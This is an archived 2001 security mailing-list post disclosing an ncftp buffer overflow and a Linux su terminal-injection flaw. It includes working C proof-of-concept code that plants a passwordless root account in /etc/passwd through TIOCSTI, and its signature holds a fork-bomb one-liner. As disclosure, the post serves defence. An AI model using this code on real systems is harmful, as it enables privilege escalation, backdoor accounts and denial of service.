[I posted it already four days ago, but nothing happend] There is a possible buffer overflow in new version of ncftp (2.4.3, released few days ago) - it uses 512-bytes long buffer to store local working directory (sigh!). You may exploit it creating eg. /TEST directory on ftp server with subdirectory eg. xxx(200)xxx/yyy(200)yyy/zzz(200)zzz. It's sufficient to crash ncftp when directory is being retreived using 'get -R /TEST'. Oh, as an addendum... There's a problem with Linux su command, as I described few posts ago (I thought it's ncurses' fault, but I was wrong). ** Big thanks to Nergal for example how to pass anything to shell if we're already controlling terminal input (TIOCSTI). ** If non-root account will be compromised, eg. with lynx/ncftp bug, and .bashrc on this non-root account will be altered to something like that: --- cat >/tmp/a.c <<X #include <sys/ioctl.h> main(){char C[]="\necho 'nergal::0:0::/:/bin/sh'>>/etc/passwd;logout\n";int i=0, P=getppid();kill(P--,9);kill(P,9);for(;i<strlen(C);i++)ioctl(0,TIOCSTI,C+i);} X gcc /tmp/a.c -o/tmp/a;/tmp/a;rm -f /tmp/a ~/.bashrc;clear -- During next su session, "echo '...' >>/etc/passwd" will be executed at root account [hopefully] :) In general, problem lies in ability to killing su itself by unprivledged process - it will still be able to control terminal i/o, because su, when killed with SIGKILL, performs no any tty hangup/reset. So we may parse anything to privledged shell, or do anything else with terminal. So there are 3 bugs: unprivledged process may kill 'su'; 'su' doesn't perform any tty checks; bash also is careless ;) Fix: replace Linux su with smarter one ;) _______________________________________________________________________ Michal Zalewski [lcamtufat_private] <= finger for pub PGP key Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch] [echo "\$0&\$0">_;chmod +x _;./_] <=------=> [tel +48 (0) 22 813 25 86]
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:46:58 PDT